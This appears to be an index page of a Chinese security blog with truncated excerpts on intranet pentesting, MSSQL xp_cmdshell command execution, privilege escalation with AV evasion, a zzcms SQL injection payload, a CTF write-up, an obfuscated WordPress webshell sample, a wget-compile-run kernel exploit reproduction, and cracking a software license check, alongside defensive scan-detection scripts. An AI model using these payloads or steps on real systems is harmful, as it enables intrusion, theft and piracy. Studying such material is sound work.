内网渗透
在上次拿下了一台内网主机后,将其作为跳板,对192.168/16网段进行了扫描
介绍先上一张内网环境拓扑图
经过扫描后,识别出几个重要资产,并将他们作为目标进行针对性的测试
192.168.122.8192.168.122.11192.168.122.12192.168.122.13192.168.122.15192.168.122.16192.168.122.54192.168.122.60
通过banner和80端口title
识别到的资产如下
192.168.101.3->锐捷交换机
192.168.135.1->锐捷AC控制器,下联5个AP
192.168.122.8->VMware vCenter主机
192.168.122.6-> ESXi主机
内网大杀器MS17-010的扫描结果
攻击路径:10.46.1.16=192.168.122.16->192.168.122.11->192.168.122.15->192.168.122.54->192.168.122.60->192.168.122.8-& ...
mssql无webshell提权
在内网中扫描到了几台sa权限的mssql,报备后做了次简单的检测
侦查Navicat连上后查看xp_cdshell是否存在
发现存在的
执行exec master..xp_cmdshell "systeminfo"发现网卡连接了一个192.168/16的内网IP
主机名: WIN-XXXXXOS 名称: Microsoft Windows Server 2008 R2 Enterprise OS 版本: 6.1.7601 Service Pack 1 Build 7601OS 制造商: Microsoft CorporationOS 配置: 独立服务器OS 构件类型: Multiprocessor Free注册的所有人: Windows 用户注册的组织: 产品 ID: 00486-001-0001076-84214初始安装日期: 2016/7/29, 17:27:35系统启动时间: 2019/8/30, 8:3 ...
某省HW中遇到的提权
某省HW中遇到的一个环境提权笔记
0x01环境:
OS: Windows Server 2012 R2
补丁情况:
KB3139914 : MS16-032KB3124280 : MS16-016KB3134228 : MS16-014KB3079904 : MS15-097KB3077657 : MS15-077KB3045171 : MS15-051KB3000061 : MS14-058KB2829361 : MS13-046KB2850851 : MS13-053 EPATHOBJ 0day 限32位KB2707511 : MS12-042 sysret -pidKB2124261 : KB2271195 MS10-065 IIS7KB970483 : MS09-020 IIS6
安全软件:360套装
Webshell: :white_check_mark:
内网
既然有16-032,为了一次成功,本地搭个环境,github上面下载到的ms16-032果不其然被Gank了
那么就需要做免杀了,然而自己做的免杀要么
要么
要么是编译好了跑不起来(vs2019编译的, ...
zzcms前台SQL注入
存储型XSS参考文章https://0x20h.com/p/9812.html
SQL注入还是markit()函数,既然没有对URI进行过滤直接写入数据库,那么能不能搞点事情呢?
先看看这个query函数怎么执行的
可以看到直接带入mysqli_query,那么尝试构造下payload吧
原始SQL语句
insert into zzcms_bad (username,ip,dose,sendtime)values('" . $_COOKIE["UserName"] . "','$userip','$url','" . date('Y-m-d H:i:s') . "')
既然只有$url可控,那么直接构造传入的URI就可以了,先直接让数据库执行sleep()函数
insert into zzcms_bad (username,ip,dose,sendtime)values('test','127.0 ...
QQ客户端一处BUG
无意中发现的一处问题
详情因为我电脑安装的flash不是国版的(不是那个某公司二次打包后的)直接安装的adobe官网的导致一些应用无法使用,比如QQ客户端的空间选项卡中的上传图片功能
然后呢,点击时会跳转到aodobe官网
验证猜想,QQ集成了几个web页面,那么如果把aodobe官网重定向呢?
先获取下访问的域名,这点可以用wireshark抓出来
本地hosts再改下,再架个web服务器
再写个html文件,放置于于/www/go/getflashGeoError/
HTML代码如下
<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta http-equiv="X-UA-Comp ...
2019年CISCN(全国大学生信息安全竞赛)华南赛区wp
题目是在Fix It环境拷下来的,写writeup时的环境是自己搭的
有些题目忘记拷贝数据库,各位大佬凑活看吧
题目的GitHub仓库:https://github.com/NS-Sp4ce/2019-Ciscn-Southern-China-Web
Web1Break It打开页面如下
按照惯例Ctrl+U看源代码,发现被注释的<!-- <p class="forgot"><a id="iforget" href="forgetpassword.php">Forgot your password?</a></p>-->
字面意思是重置密码的页面,访问试试
由于不知道用户名,抓包随便输入个用户名看看返回的信息
OK,找个用户名字典爆破下
设置下
爆破出admin123这个用户存在
输入后,跳转到下一个页面
4位验证码爆破走起
扔Burpsuite里
设置
走起,然后踩了第一个坑
验证码全部错误,Ctrl+U看了下源代码
哦豁,设置b ...
5W WordPress站点被shell事件调查报告
情报来源该情报来源:https://www.v2ex.com/t/588483
事件跟进随后笔者联系到了几个.cn域名的站长,获取了相关挂马文件、安装的插件和访客日志
简单比对后发现插件耦合度为0,基本排除了插件漏洞的可能性
从其中一个站长获取的挂马文件(名称wp************.php)如下:
<?php goto M0cHaak; AfBuVvu: echo "\x61\165\x78\x36\x54\150\145\x69\157\x47\x68\165\x65\121\165\x33"; goto DzfJmKX; XxMXe8C: $CZMkFQn = "\x2e\57{$i_9JllM}\x20\76\40\57\x64\x65\166\x2f\x6e\165\x6c\x6c\40\62\76\x2f\x64\x65\166\x2f\x6e\165\154\154\40\46"; goto b11TDzU; Nd2oZhY: exec("\160\x6b\151\x6c\x6c\40 ...
CVE-2019-13272 复现&注意事项
记录下CVE-2019-13272复现和注意事项
复现
OS: Ubuntu 18.04
Kernel: 4.18.0-15-generic
步骤
下载CVE-2019-13272POC:https://github.com/bcoles/kernel-exploits/blob/master/CVE-2019-13272/poc.c
wget https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
编译gcc -s poc.c -o test
赋予权限chmod +x test
运行./test
复现结束
坑既然能在桌面环境下提权,那在ssh下是否能提权呢?
继续验证
λ ssh [email protected] authenticity of host '10.2.2.133 (10.2.2.133)' can't be established.ECDSA key fingerprint is SHA25 ...
Apache Logs View破解笔记
记录下Apache Logs Viewer的破解笔记
拿到软件先查壳,发现是.net的,混淆过
de4dot去混淆后
打开看看限制的功能和输入注册码那提示什么
随便输个,看看报错
关键词unlock code
去混淆后的软件载入dnspy,全局搜下看看
搜到了2个主窗体的,直接看unlockCodeToolStripMenuItem_Click方法
// Token: 0x060001E4 RID: 484 RVA: 0x0001E230 File Offset: 0x0001C430 private void unlockCodeToolStripMenuItem_Click(object sender, EventArgs e) { string text = this.prefs_0.Key; if (!InputForm.smethod_3("Apache Logs Viewer | " + Class96.smethod_264(), Class96.smethod_143(), ref text)) { r ...
WannaMine蠕虫清理
今天接到了内网的检测服务器告警,检测到我的主机对外扫描445端口
本次监测使用了2台基于VMware ESXi架构的虚拟服务器,IP及系统架构如下
10.16.11.51 CentOS7【监测机】
10.16.11.15 Windows Server 2008 R2【诱捕机】
脚本编写脚本使用Python3编写,运行于CentOS7虚拟机(10.16.11.51)上,由于感染后的机器特征为向外部扫描445端口,如下图所示
脚本编写思路为监听445端口,如有连接即写入文件并记录连接IP代码如下
# 服务器import socketimport threadingimport time# 处理客户端请求# 监听任意地址IP_ADDRESS = '0.0.0.0'# 记录的文件名FILENAME = 'log.txt'# 监听端口PORT = 445def printalert(string): print('\033[1;31m ' + string + ' \033[0m')def prints ...
被动式检测445端口扫描
为了检测内网的端口扫描写了个脚本。。。
事情起源之前一直在做域控搭建,结果域控机(DC)老是莫名其妙重启,排查事件管理器后发现了点东西
一堆的电源报警事件(该事件只会在系统非正常关机、重启时出现),后面进ESXi管理面板准备重装时发现蓝屏了,报错显示srv.sys驱动出现问题,经过查询后发现系统有MS17-010漏洞(wannacry干的,能把2016打蓝屏也是没谁了)
处理过程打补丁,用脚本检测内网的扫描情况,汇报上面让他们处理去吧。。
脚本'''@Description: @Author: Sp4ce@Github: https://github.com/NS-Sp4ce@Date: 2019-05-29 23:18:36@LastEditors: Sp4ce@LastEditTime: 2019-05-29 23:18:36'''# 服务器import socketimport threadingimport timeimport os# 处理客户端请求# 监听任意地址IP_ADDRESS = '0.0. ...
域渗透—环境部署
记录下部署靶机环境
部署靶机环境设置首先打开靶机的防火墙规则
环境拓扑环境部署如下图
环境部署10.16.11.15本台主机配置如下
OS:Windows Server 2008 R2
App:phpstudy
CMS: DeDeCMS 20180109
10.16.11.16本台主机配置如下
OS:Windows Server 2012 R2
App: phpstudy
CMS: DeDeCMS 20180109